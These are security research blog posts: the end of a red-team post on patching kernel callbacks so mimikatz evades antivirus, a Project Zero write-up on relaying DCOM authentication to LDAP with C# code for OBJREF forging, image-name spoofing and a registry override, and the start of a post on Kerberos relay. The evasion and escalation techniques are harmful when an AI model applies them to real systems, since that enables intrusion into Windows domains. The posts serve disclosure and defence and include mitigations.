UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumer).

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3 byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Windows Exploitation Tricks: Relaying DCOM Authentication

20 October 2021 at 16:38
By: Ryan

Posted by James Forshaw, Project Zero

In my previous blog post I discussed the possibility of relaying Kerberos authentication from a DCOM connection. I was originally going to provide a more in-depth explanation of how that works, but as it's quite involved I thought it was worthy of its own blog post. This is primarily a technique to get relay authentication from another user on the same machine and forward that to a network service such as LDAP. You could use this to escalate privileges on a host using a technique similar to a blog post from Shenanigans Labs but removing the requirement for the WebDAV service. Let's get straight to it.

Background

The technique to locally relay authentication for DCOM was something I originally reported back in 2015 (issue 325). This issue was fixed as CVE-2015-2370, however the underlying authentication relay using DCOM remained. This was repurposed and expanded upon by various others for local and remote privilege escalation in the RottenPotato series of exploits, the latest in that line being RemotePotato which is currently unpatched as of October 2021.

The key feature that the exploit abused is standard COM marshaling. Specifically when a COM object is marshaled so that it can be used by a different process or host, the COM runtime generates an OBJREF structure, most commonly the OBJREF_STANDARD form. This structure contains all the information necessary to establish a connection between a COM client and the original object in the COM server.

Connecting to the original object from the OBJREF is a two part process:

  1. The client extracts the Object Exporter ID (OXID) from the structure and contacts the OXID resolver service specified by the RPC binding information in the OBJREF.
  2. The client uses the OXID resolver service to find the RPC binding information of the COM server which hosts the object and establishes a connection to the RPC endpoint to access the object's interfaces.

Both of these steps require establishing an MSRPC connection to an endpoint. Commonly this is either locally over ALPC, or remotely via TCP. If a TCP connection is used then the client will also authenticate to the RPC server using NTLM or Kerberos based on the security bindings in the OBJREF.

The first key insight I had for issue 325 is that you can construct an OBJREF which will always establish a connection to the OXID resolver service over TCP, even if the service was on the local machine. To do this you specify the hostname as an IP address and an arbitrary TCP port for the client to connect to. This allows you to listen locally and when the RPC connection is made the authentication can be relayed or repurposed.

This isn't yet a privilege escalation, since you need to convince a privileged user to unmarshal the OBJREF. This was the second key insight: you could get a privileged service to unmarshal an arbitrary OBJREF easily using the CoGetInstanceFromIStorage API and activating a privileged COM service. This marshals a COM object, creates the privileged COM server and then unmarshals the object in the server's security context. This results in an RPC call to the fake OXID resolver authenticated using a privileged user's credentials. From there the authentication could be relayed to the local system for privilege escalation.

Diagram of an DCOM authentication relay attack from issue 325

Being able to redirect the OXID resolver RPC connection locally to a different TCP port was not by design and Microsoft eventually fixed this in Windows 10 1809/Server 2019. The underlying issue prior to Windows 10 1809 was the string containing the host returned as part of the OBJREF was directly concatenated into an RPC string binding. Normally the RPC string binding should have been in the form of:

ncacn_ip_tcp:ADDRESS[135]

Where ncacn_ip_tcp is the protocol sequence for RPC over TCP, ADDRESS is the target address which would come from the string binding, and [135] is the well-known TCP port for the OXID resolver appended by RPCSS. However, as the ADDRESS value is inserted manually into the binding then the OBJREF could specify its own port, resulting in the string binding:

ncacn_ip_tcp:ADDRESS[9999][135]

The RPC runtime would just pick the first port in the binding string to connect to, in this case 9999, and would ignore the second port 135. This behavior was fixed by calling the RpcStringBindingCompose API which will correctly escape the additional port number which ensures it's ignored when making the RPC connection.

This is where the RemotePotato exploit, developed by Antonio Cocomazzi and Andrea Pierini, comes into the picture. While it was no longer possible to redirect the OXID resolving to a local TCP server, you could redirect the initial connection to an external server. A call is made to the IObjectExporter::ResolveOxid2 method which can return an arbitrary RPC binding string for a fake COM object.

Unlike the OXID resolver binding string, the one for the COM object is allowed to contain an arbitrary TCP port. By returning a binding string for the original host on an arbitrary TCP port, the second part of the connection process can be relayed rather than the first. The relayed authentication can then be sent to a domain server, such as LDAP or SMB, as long as they don't enforce signing.

Diagram of an DCOM authentication relay attack from Remote Potato

This exploit has the clear disadvantage of requiring an external machine to act as the target of the initial OXID resolving. While investigating the Kerberos authentication relay attacks for DCOM, could I find a way to do everything on the same machine?

Remote ➜ Local Potato

If we're relaying the authentication for the second RPC connection, could we get the local OXID resolver to do the work for us and resolve to a local COM server on a randomly selected port? One of my goals is to write the least amount of code, which is why we'll do everything in C# and .NET.

byte[] ba = GetMarshalledObject(new object());

var std = COMObjRefStandard.FromArray(ba);

Console.WriteLine("IPID: {0}", std.Ipid);

Console.WriteLine("OXID: {0:X08}", std.Oxid);

Console.WriteLine("OID : {0:X08}", std.Oid);

std.StringBindings.Clear();

std.StringBindings.Add(RpcTowerId.Tcp, "127.0.0.1");

Console.WriteLine($"objref:{0}:", Convert.ToBase64String(std.ToArray());

This code creates a basic .NET object and COM marshals it to a standard OBJREF. I've left out the code for the marshalling and parsing of the OBJREF, but much of that is already present in the linked issue 325. We then modify the list of string bindings to only include a TCP binding for 127.0.0.1, forcing the OXID resolver to use TCP. If you specify a computer's hostname then the OXID resolver will use ALPC instead. Note that the string bindings in the OBJREF are only for binding to the OXID resolver, not the COM server itself.

We can then convert the modified OBJREF into an objref moniker. This format is useful as it allows us to trivially unmarshal the object in another process by calling the Marshal::BindToMoniker API in .NET and passing the moniker string. For example to bind to the COM object in PowerShell you can run the following command:

[Runtime.InteropServices.Marshal]::BindToMoniker("objref:TUVP...:")

Immediately after binding to the moniker a firewall dialog is likely to appear as shown:

Firewall dialog for the COM server when a TCP binding is created

This is requesting the user to allow our COM server process access to listen on all network interfaces for incoming connections. This prompt only appears when the client tries to resolve the OXID as DCOM supports dynamic RPC endpoints. Initially when the COM server starts it only listens on ALPC, but the RPCSS service can ask the server to bind to additional endpoints.

This request is made through an internal RPC interface that every COM server implements for use by the RPCSS service. One of the functions on this interface is UseProtSeq, which requests that the COM server enables a TCP endpoint. When the COM server receives the UseProtSeq call it tries to bind a TCP server to all interfaces, which subsequently triggers the Windows Defender Firewall to prompt the user for access.

Enabling the firewall permission requires administrator privileges. However, as we only need to listen for connections via localhost we shouldn't need to modify the firewall so the dialog can be dismissed safely. However, going back to the COM client we'll see an error reported.

Exception calling "BindToMoniker" with "1" argument(s):

"The RPC server is unavailable. (Exception from HRESULT: 0x800706BA)"

If we allow our COM server executable through the firewall, the client is able to connect over TCP successfully. Clearly the firewall is affecting the behavior of the COM client in some way even though it shouldn't. Tracing through the unmarshalling process in the COM client, the error is being returned from RPCSS when trying to resolve the OXID's binding information. This would imply that no connection attempt is made, and RPCSS is detecting that the COM server wouldn't be allowed through the firewall and refusing to return any binding information for TCP.

Further digging into RPCSS led me to the following function:

BOOL IsPortOpen(LPWSTR ImageFileName, int PortNumber) {

  INetFwMgr* mgr;

 

  CoCreateInstance(CLSID_FwMgr, NULL, CLSCTX_INPROC_SERVER, 

                   IID_PPV_ARGS(&mgr));

  VARIANT Allowed;

  VARIANT Restricted;

  mgr->IsPortAllowed(ImageFileName, NET_FW_IP_VERSION_ANY, 

             PortNumber, NULL, NET_FW_IP_PROTOCOL_TCP,

             &Allowed, &Restricted);

  if (VT_BOOL != Allowed.vt)

    return FALSE;

  return Allowed.boolVal == VARIANT_TRUE;

}

This function uses the HNetCfg.FwMgr COM object, and calls INetFwMgr::IsPortAllowed to determine if the process is allowed to listen on the specified TCP port. This function is called for every TCP binding when enumerating the COM server's bindings to return to the client. RPCSS passes the full path to the COM server's executable and the listening TCP port. If the function returns FALSE then RPCSS doesn't consider it valid and won't add it to the list of potential bindings.

If the OXID resolving process doesn't have any binding at the end of the lookup process it will return the RPC_S_SERVER_UNAVAILABLE error and the COM client will fail to bind to the server. How can we get around this limitation without needing administrator privileges to allow our server through the firewall? We can convert this C++ code into a small PowerShell function to test the behavior of the function to see what would grant access.

function Test-IsPortOpen {

    param(

        [string]$Name,

        [int]$Port

    )

    $mgr = New-Object -ComObject "HNetCfg.FwMgr"

    $allow = $null

    $mgr.IsPortAllowed($Name, 2, $Port, "", 6, [ref]$allow, $null)

    $allow

}

foreach($f in $(ls "$env:WINDIR\system32\*.exe")) {    

    if (Test-IsPortOpen $f.FullName 12345) {

        Write-Host $f.Fullname

    }

}

This script enumerates all executable files in system32 and checks if they'd be allowed to connect to TCP port 12345. Normally the TCP port would be selected automatically, however the COM server can use the RpcServerUseProtseqEp API to pre-register a known TCP port for RPC communication, so we'll just pick port 12345.

The only executable in system32 that returns true from Test-IsPortOpen is svchost.exe. That makes some sense, the default firewall rules usually permit a limited number of services to be accessible through the firewall, the majority of which are hosted in a shared service process.

This check doesn't guarantee a COM server will be allowed through the firewall, just that it's potentially accessible in order to return a TCP binding string. As the connection will be via localhost we don't need to be allowed through the firewall, only that IsPortOpen thinks we could be open. How can we spoof the image filename?

The obvious trick would be to create a svchost.exe process and inject our own code in there. However, that is harder to achieve through pure .NET code and also injecting into an svchost executable is a bit of a red flag if something is monitoring for malicious code which might make the exploit unreliable. Instead, perhaps we can influence the image filename used by RPCSS?

Digging into the COM runtime, when a COM server registers itself with RPCSS it passes its own image filename as part of the registration information. The runtime gets the image filename through a call to GetModuleFileName, which gets the value from the ImagePathName field in the process parameters block referenced by the PEB.

We can modify this string in our own process to be anything we like, then when COM is initialized, that will be sent to RPCSS which will use it for the firewall check. Once the check passes, RPCSS will return the TCP string bindings for our COM server when unmarshalling the OBJREF and the client will be able to connect. This can all be done with only minor in-process modifications from .NET and no external servers required.

Capturing Authentication

At this point a new RPC connection will be made to our process to communicate with the marshaled COM object. During that process the COM client must authenticate, so we can capture and relay that authentication to another service locally or remotely. What's the best way to capture that authentication traffic?

Before we do anything we need to select what authentication we want to receive, and this will be reflected in the OBJREF's security bindings. As we're doing everything using the existing COM runtime we can register what RPC authentication services to use when calling CoInitializeSecurity in the COM server through the asAuthSvc parameter.

var svcs = new SOLE_AUTHENTICATION_SERVICE[] {

    new SOLE_AUTHENTICATION_SERVICE() {

      dwAuthnSvc = RpcAuthenticationType.Kerberos,

      pPrincipalName = "HOST/DC.domain.com"

    }

};

var str = SetProcessModuleName("System");

try

{

   CoInitializeSecurity(IntPtr.Zero, svcs.Length, svcs,

        IntPtr.Zero, AuthnLevel.RPC_C_AUTHN_LEVEL_DEFAULT,

        ImpLevel.RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero,

        EOLE_AUTHENTICATION_CAPABILITIES.EOAC_DYNAMIC_CLOAKING,

        IntPtr.Zero);

}

finally

{

    SetProcessModuleName(str);

}

In the above code, we register to only receive Kerberos authentication and we can also specify an arbitrary SPN as I described in the previous blog post. One thing to note is that the call to CoInitializeSecurity will establish the connection to RPCSS and pass the executable filename. Therefore we need to modify the filename before calling the API as we can't change it after the connection has been established.

For swag points I specify the filename System rather than build the full path to svchost.exe. This is the name assigned to the kernel which is also granted access through the firewall. We restore the original filename after the call to CoInitializeSecurity to reduce the risk of it breaking something unexpectedly.

That covers the selection of the authentication service to use, but doesn't help us actually capture that authentication. My first thought to capture the authentication was to find the socket handle for the TCP server, close it and create a new socket in its place. Then I could directly process the RPC protocol and parse out the authentication. This felt somewhat risky as the RPC runtime would still think it has a valid TCP server socket and might fail in unexpected ways. Also it felt like a lot of work, when I have a perfectly good RPC protocol parser built into Windows.

I then resigned myself to hooking the SSPI APIs, although ideally I'd prefer not to do so. However, once I started looking at the RPC runtime library there weren't any imports for the SSPI APIs to hook into and I really didn't want to patch the functions themselves. It turns out that the RPC runtime loads security packages dynamically, based on the authentication service requested and the configuration of the HKLM\SOFTWARE\Microsoft\Rpc\SecurityService registry key.

Screenshot of the Registry Editor showing HKLM\SOFTWARE\Microsoft\Rpc\SecurityService key

The key, shown in the above screenshot has a list of values. The value's name is the number assigned to the authentication service, for example 16 is RPC_C_AUTHN_GSS_KERBEROS. The value's data is then the name of the DLL to load which provides the API, for Kerberos this is sspicli.dll.

The RPC runtime then loads a table of security functions from the DLL by calling its exported InitSecurityInterface method. At least for sspicli the table is always the same and is a pre-initialized structure in the DLL's data section. This is perfect, we can just call InitSecurityInterface before the RPC runtime is initialized to get a pointer to the table then modify its function pointers to point to our own implementation of the API. As an added bonus the table is in a writable section of the DLL so we don't even need to modify the memory protection.

Of course implementing the hooks is non-trivial. This is made more complex because RPC uses the DCE style Kerberos authentication which requires two tokens from the client before the server considers the authentication complete. This requires maintaining more state to keep the RPC server and client implementations happy. I'll leave this as an exercise for the reader.

Choosing a Relay Target Service

The next step is to choose a suitable target service to relay the authentication to. For issue 325 I relayed the authentication to the same machine's DCOM activator RPC service and was able to achieve an arbitrary file write.

I thought that maybe I could do so again, so I modified my .NET RPC client to handle the relayed authentication and tried accessing local RPC services. No matter what RPC server or function I called, I always got an access denied error. Even if I wrote my own RPC server which didn't have any checks, it would fail.

Digging into the failure it turned out that at some point (I don't know specifically when), Microsoft added a mitigation into the RPC runtime to make it very difficult to relay authentication back to the same system.

void SSECURITY_CONTEXT::ValidateUpgradeCriteria() {

  if (this->AuthnLevel < RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) {

    if (IsLoopback())

      this->UnsafeLoopbackAuth = TRUE;

  }

}

The SSECURITY_CONTEXT::ValidateUpgradeCriteria method is called when receiving RPC authentication packets. If the authentication level for the RPC connection is less than RPC_C_AUTHN_LEVEL_PKT_INTEGRITY such as RPC_C_AUTHN_LEVEL_PKT_CONNECT and the authentication was from the same system then a flag is set to true in the security context. The IsLoopback function calls the QueryContextAttributes API for the undocumented SECPKG_ATTR_IS_LOOPBACK attribute value from the server security context. This attribute indicates if the authentication was from the local system.

When an RPC call is made the server will check if the flag is true, if it is then the call will be immediately rejected before any code is called in the server including the RPC interface's security callback. The only way to pass this check is either the authentication doesn't come from the local system or the authentication level is RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above which then requires the client to know the session key for signing or encryption. The RPC client will also check for local authentication and will increase the authentication level if necessary. This is an effective way of preventing the relay of local authentication to elevate privileges.

Instead as I was focussing on Kerberos, I came to the conclusion that relaying the authentication to an enterprise network service was more useful. As the default settings for a domain controller's LDAP service still do not enforce signing, it would seem a reasonable target. As we'll see, this provides a limitation of the source of the authentication, as it must not enable Integrity otherwise the LDAP server will enforce signing.

The problem with LDAP is I didn't have any code which implemented the protocol. I'm sure there is some .NET code to do it somewhere, but the fewer dependencies I have the better. As I mentioned in the previous blog post, Windows has a builtin LDAP library in wldap32.dll. Could I repurpose its API but convert it into using relayed authentication?

Unsurprisingly the library doesn't have a "Enable relayed authentication" mode, but after a few minutes in a disassembler, it was clear it was also delay-loading the SSPI interfaces through the InitSecurityInterface method. I could repurpose my code for capturing the authentication for relaying the authentication. There was initially a minor issue, accidentally or on purpose there was a stray call to QueryContextAttributes which was directly imported, so I needed to patch that through an Import Address Table (IAT) hook as distasteful as that was.

There was still a problem however. When the client connects it always tries to enable LDAP signing, as we are relaying authentication with no access to the session key this causes the connection to fail. Setting the option value LDAP_OPT_SIGN in the library to false didn't change this behavior. I needed to set the LdapClientIntegrity registry value to 0 in the LDAP service's key before initializing the library. Unfortunately that key is only modifiable by administrators. I could have modified the library itself, but as it was checking the key during DllMain it would be a complex dance to patch the DLL in the middle of loading.

Instead I decided to override the HKEY_LOCAL_MACHINE key. This is possible for the Win32 APIs by using the RegOverridePredefKey API. The purpose of the API is to allow installers to redirect administrator-only modifications to the registry into a writable location, however for our purposes we can also use it to redirect the reading of the LdapClientIntegrity registry value.

[DllImport("Advapi32.dll")]

static extern int RegOverridePredefKey(

    IntPtr hKey,

    IntPtr hNewHKey

);

[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]

static extern IntPtr LoadLibrary(string libname);

static readonly IntPtr HKEY_LOCAL_MACHINE = new IntPtr(-2147483646);

static void OverrideLocalMachine(RegistryKey key)

{

    int res = RegOverridePredefKey(HKEY_LOCAL_MACHINE,

        key?.Handle.DangerousGetHandle() ?? IntPtr.Zero);

    if (res != 0)

        throw new Win32Exception(res);

}

static void LoadLDAPLibrary()

{

    string dummy = @"SOFTWARE\DUMMY";

    string target = @"System\CurrentControlSet\Services\LDAP";

    using (var key = Registry.CurrentUser.CreateSubKey(dummy, true))

    {

        using (var okey = key.CreateSubKey(target, true))

        {

            okey.SetValue("LdapClientIntegrity", 0,

                          RegistryValueKind.DWord);

            OverrideLocalMachine(key);

            try

            {

                IntPtr lib = LoadLibrary("wldap32.dll");

                if (lib == IntPtr.Zero)

                    throw new Win32Exception();

            }

            finally

            {

                OverrideLocalMachine(null);

                Registry.CurrentUser.DeleteSubKeyTree(dummy);

            }

        }

    }

}

This code redirects the HKEY_LOCAL_MACHINE key and then loads the LDAP library. Once it's loaded we can then revert the override so that everything else works as expected. We can now repurpose the built-in LDAP library to relay Kerberos authentication to the domain controller. For the final step, we need a privileged COM service to unmarshal the OBJREF to start the process.

Choosing a COM Unmarshaller

The RemotePotato attack assumes that a more privileged user is authenticated on the same machine. However I wanted to see what I could do without that requirement. Realistically the only thing that can be done is to relay the computer's domain account to the LDAP server.

To get access to authentication for the computer account, we need to unmarshal the OBJREF inside a process running as either SYSTEM or NETWORK SERVICE. These local accounts are mapped to the computer account when authenticating to another machine on the network.

We do have one big limitation on the selection of a suitable COM server: it must make the RPC connection using the RPC_C_AUTHN_LEVEL_PKT_CONNECT authentication level. Anything above that will enable Integrity on the authentication which will prevent us relaying to LDAP. Fortunately RPC_C_AUTHN_LEVEL_PKT_CONNECT is the default setting for DCOM, but unfortunately all services which use the svchost process change that default to RPC_C_AUTHN_LEVEL_PKT which enables Integrity.

After a bit of hunting around with OleViewDotNet, I found a good candidate class, CRemoteAppLifetimeManager (CLSID: 0bae55fc-479f-45c2-972e-e951be72c0c1) which is hosted in its own executable, runs as NETWORK SERVICE, and doesn't change any default settings as shown below.

Screenshot of the OleViewDotNet showing the security flags of the CRemoteAppLifetimeManager COM server

The server doesn't change the default impersonation level from RPC_C_IMP_LEVEL_IDENTIFY, which means the negotiated token will only be at SecurityIdentification level. For LDAP, this doesn't matter as it only uses the token for access checking, not to open resources. However, this would prevent using the same authentication to access something like the SMB server. I'm confident that given enough effort, a COM server with both RPC_C_AUTHN_LEVEL_PKT_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE could be found, but it wasn't necessary for my exploit.

Wrapping Up

That's a somewhat complex exploit. However, it does allow for authentication relay, with arbitrary Kerberos tokens from a local user to LDAP on a default Windows 10 system. Hopefully it might provide some ideas of how to implement something similar without always needing to write your protocol servers and clients and just use what's already available.

This exploit is very similar to the existing RemotePotato exploit that Microsoft have already stated will not be fixed. This is because Microsoft considers authentication relay attacks to be an issue with the configuration of the Windows network, such as not enforcing signing on LDAP, rather than the particular technique used to generate the authentication relay. As I mentioned in the previous blog post, at most this would be assessed as a Moderate severity issue which does not reach the bar for fixing as part of regular updates (or potentially, not being fixed at all).

As for mitigating this issue without it being fixed by Microsoft, a system administrator should follow Microsoft's recommendations to enable signing and/or encryption on any sensitive service in the domain, especially LDAP. They can also enable Extended Protection for Authentication where the service is protected by TLS. They can also configure the default DCOM authentication level to be RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above. These changes would make the relay of Kerberos, or NTLM significantly less useful.

Using Kerberos for Authentication Relay Attacks

20 October 2021 at 16:26
By: Ryan

Posted by James Forshaw, Project Zero

This blog post is a summary of some research I've been doing into relaying Kerberos authentication in Windows domain environments. To keep this blog shorter I am going to assume you have a working knowledge of Windows network authentication, and specifically Kerberos and NTLM. For a quick primer on Kerberos see this page which is part of Microsoft's Kerberos extension documentation or you can always read RFC4120.

Background

Windows based enterprise networks rely on network authentication protocols, such as NT Lan Manager (NTLM) and Kerberos to implement single sign on. These protocols allow domain users to seamlessly connect to corporate resources without having to repeatedly enter their passwords. This works by the computer's Local Security Authority (LSA) process storing the user's credentials when the user first authenticates. The LSA can then reuse those credentials for network authentication without requiring user interaction.

However, the convenience of not prompting the user for their credentials when performing network authentication has a downside. To be most useful, common clients for network protocols such as HTTP or SMB must automatically perform the authentication without user interaction otherwise it defeats the purpose of avoiding asking the user for their credentials.

This automatic authentication can be a problem if an attacker can trick a user into connecting to a server they control. The attacker could induce the user's network client to start an authentication process and use that information to authenticate to an unrelated service allowing the attacker to access that service's resources as the user. When the authentication protocol is captured and forwarded to another system in this way it's referred to as an Authentication Relay attack.

Simple diagram of an authentication relay attack

Authentication relay attacks using the NTLM protocol were first published all the way back in 2001 by Josh Buchbinder (Sir Dystic) of the Cult of the Dead Cow. However, even in 2021 NTLM relay attacks still represent a threat in default configurations of Windows domain networks. The most recent major abuse of NTLM relay was through the Active Directory Certificate Services web enrollment service. This combined with the PetitPotam technique to induce a Domain Controller to perform NTLM authentication allows for a Windows domain to be compromised by an unauthenticated attacker.

Over the years Microsoft has made many efforts to mitigate authentication relay attacks. The best mitigations rely on the fact that the attacker does not have knowledge of the user's password or control over the authentication process. This includes signing and encryption (sealing) of network traffic using a session key which is protected by the user's password or channel binding as part of Extended Protection for Authentication (EPA) which prevents relay of authentication to a network protocol under TLS.

Another mitigation regularly proposed is to disable NTLM authentication either for particular services or network wide using Group Policy. While this has potential compatibility issues, restricting authentication to only Kerberos should be more secure. That got me thinking, is disabling NTLM sufficient to eliminate authentication relay attacks on Windows domains?

Why are there no Kerberos Relay Attacks?

The obvious question is, if NTLM is disabled could you relay Kerberos authentication instead? Searching for Kerberos Relay attacks doesn't yield much public research that I could find. There is the krbrelayx tool written by Dirk-jan which is similar in concept to the ntlmrelayx tool in impacket, a common tool for performing NTLM authentication relay attacks. However as the accompanying blog post makes clear this is a tool to abuse unconstrained delegation rather than relay the authentication.

I did find a recent presentation by Sagi Sheinfeld, Eyal Karni, Yaron Zinar from Crowdstrike at Defcon 29 (and also coming up at Blackhat EU 2021) which relayed Kerberos authentication. The presentation discussed MitM network traffic to specific servers, then relaying the Kerberos authentication. A MitM attack relies on being able to spoof an existing server through some mechanism, which is a well known risk.  The last line in the presentation is "Microsoft Recommendation: Avoid being MITM’d…" which seems a reasonable approach to take if possible.

However a MitM attack is slightly different to the common NTLM relay attack scenario where you can induce a domain joined system to authenticate to a server an attacker controls and then forward that authentication to an unrelated service. NTLM is easy to relay as it wasn't designed to distinguish authentication to a particular service from any other. The only unique aspect was the server (and later client) challenge but that value wasn't specific to the service and so authentication for say SMB could be forwarded to HTTP and the victim service couldn't tell the difference. Subsequently EPA has been retrofitted onto NTLM to make the authentication specific to a service, but due to backwards compatibility these mitigations aren't always used.

On the other hand Kerberos has always required the target of the authentication to be specified beforehand through a principal name, typically this is a Service Principal Name (SPN) although in certain circumstances it can be a User Principal Name (UPN). The SPN is usually represented as a string of the form CLASS/INSTANCE:PORT/NAME, where CLASS is the class of service, such as HTTP or CIFS, INSTANCE is typically the DNS name of the server hosting the service and PORT and NAME are optional.

The SPN is used by the Kerberos Ticket Granting Server (TGS) to select the shared encryption key for a Kerberos service ticket generated for the authentication. This ticket contains the details of the authenticating user based on the contents of the Ticket Granting Ticket (TGT) that was requested during the user's initial Kerberos authentication process. The client can then package the service's ticket into an Authentication Protocol Request (AP_REQ) authentication token to send to the server.

Without knowledge of the shared encryption key the Kerberos service ticket can't be decrypted by the service and the authentication fails. Therefore if Kerberos authentication is attempted to an SMB service with the SPN CIFS/fileserver.domain.com, then that ticket shouldn't be usable if the relay target is a HTTP service with the SPN HTTP/fileserver.domain.com, as the shared key should be different.

In practice that's rarely the case in Windows domain networks. The Domain Controller associates the SPN with a user account, most commonly the computer account of the domain joined server and the key is derived from the account's password. The CIFS/fileserver.domain.com and HTTP/fileserver.domain.com SPNs would likely be assigned to the FILESERVER$ computer account, therefore the shared encryption key will be the same for both SPNs and in theory the authentication could be relayed from one service to the other. The receiving service could query for the authenticated SPN string from the authentication APIs and then compare it to its expected value, but this check is typically optional.

The selection of the SPN to use for the Kerberos authentication is typically defined by the target server's host name. In a relay attack the attacker's server will not be the same as the target. For example, the SMB connection might be targeting the attacker's server, and will assign the SPN CIFS/evil.com. Assuming this SPN is even registered it would in all probability have a different shared encryption key to the CIFS/fileserver.domain.com SPN due to the different computer accounts. Therefore relaying the authentication to the target SMB service will fail as the ticket can't be decrypted.

The requirement that the SPN is associated with the target service's shared encryption key is why I assume few consider Kerberos relay attacks to be a major risk, if not impossible. There's an assumption that an attacker cannot induce a client into generating a service ticket for an SPN which differs from the host the client is connecting to.

However, there's nothing inherently stopping Kerberos authentication being relayed if the attacker can control the SPN. The only way to stop relayed Kerberos authentication is for the service to protect itself through the use of signing/sealing or channel binding which rely on the shared knowledge between the client and server, but crucially not the attacker relaying the authentication. However, even now these service protections aren't the default even on critical protocols such as LDAP.

As the only limit on basic Kerberos relay (in the absence of service protections) is the selection of the SPN, this research focuses on how common protocols select the SPN and whether it can be influenced by the attacker to achieve Kerberos authentication relay.

Kerberos Relay Requirements

It's easy to demonstrate in a controlled environment that Kerberos relay is possible. We can write a simple client which uses the Security Support Provider Interface (SSPI) APIs to communicate with the LSA and implement the network authentication. This client calls the InitializeSecurityContext API which will generate an AP_REQ authentication token containing a Kerberos Service Ticket for an arbitrary SPN. This AP_REQ can be forwarded to an intermediate server and then relayed to the service the SPN represents. You'll find this will work, again to reiterate, assuming that no service protections are in place.

However, there are some caveats in the way a client calls InitializeSecurityContext which will impact how useful the generated AP_REQ is even if the attacker can influence the SPN. If the client specifies any one of the following request flags, ISC_REQ_CONFIDENTIALITY, ISC_REQ_INTEGRITY, ISC_REQ_REPLAY_DETECT or ISC_REQ_SEQUENCE_DETECT then the generated AP_REQ will enable encryption and/or integrity checking. When the AP_REQ is received by the server using the AcceptSecurityContext API it will return a set of flags which indicate if the client enabled encryption or integrity checking. Some services use these returned flags to opportunistically enable service protections.

For example LDAP's default setting is to enable signing/encryption if the client supports it. Therefore you shouldn't be able to relay Kerberos authentication to LDAP if the client enabled any of these protections. However, other services such as HTTP don't typically support signing and sealing and so will happily accept authentication tokens which specify the request flags.

Another caveat is the client could specify channel binding information, typically derived from the certificate used by the TLS channel used in the communication. The channel binding information can be controlled by the attacker, but not set to arbitrary values without a bug in the TLS implementation or the code which determines the channel binding information itself.

While services have an option to only enable channel binding if it's supported by the client, all Windows Kerberos AP_REQ tokens indicate support through the KERB_AP_OPTIONS_CBT options flag in the authenticator. Sagi Sheinfeld et al did demonstrate (see slide 22 in their presentation) that if you can get the AP_REQ from a non-Windows source it will not set the options flag and so no channel binding is enforced, but that was apparently not something Microsoft will fix. It is also possible that a Windows client disables channel binding through a registry configuration option, although that seems to be unlikely in real world networks.

If the client specifies the ISC_REQ_MUTUAL_AUTH request flag when generating the initial AP_REQ it will enable mutual authentication between the client and server. The client expects to receive an Authentication Protocol Response (AP_REP) token from the server after sending the AP_REQ to prove it has possession of the shared encryption key. If the server doesn't return a valid AP_REP the client can assume it's a spoofed server and refuse to continue the communication.

From a relay perspective, mutual authentication doesn't really matter as the server is the target of the relay attack, not the client. The target server will assume the authentication has completed once it's accepted the AP_REQ, so that's all the attacker needs to forward. While the server will generate the AP_REP and return it to the attacker they can just drop it unless they need the relayed client to continue to participate in the communication for some reason.

One final consideration is that the SSPI APIs have two security packages which can be used to implement Kerberos authentication, Negotiate and Kerberos. The Negotiate protocol wraps the AP_REQ (and other authentication tokens) in the SPNEGO protocol whereas Kerberos sends the authentication tokens using a simple GSS-API wrapper (see RFC4121).

The first potential issue is Negotiate is by far the most likely package in use as it allows a network protocol the flexibility to use the most appropriate authentication protocol that the client and server both support. However, what happens if the client uses the raw Kerberos package but the server uses Negotiate?

This isn't a problem as the server implementation of Negotiate will pass the input token to the function NegpDetermineTokenPackage in lsasrv.dll during the first call to AcceptSecurityContext. This function detects if the client has passed a GSS-API Kerberos token (or NTLM) and enables a pass through mode where Negotiate gets out of the way. Therefore even if the client uses the Kerberos package you can still authenticate to the server and keep the client happy without having to extract the inner authentication token or wrap up response tokens.

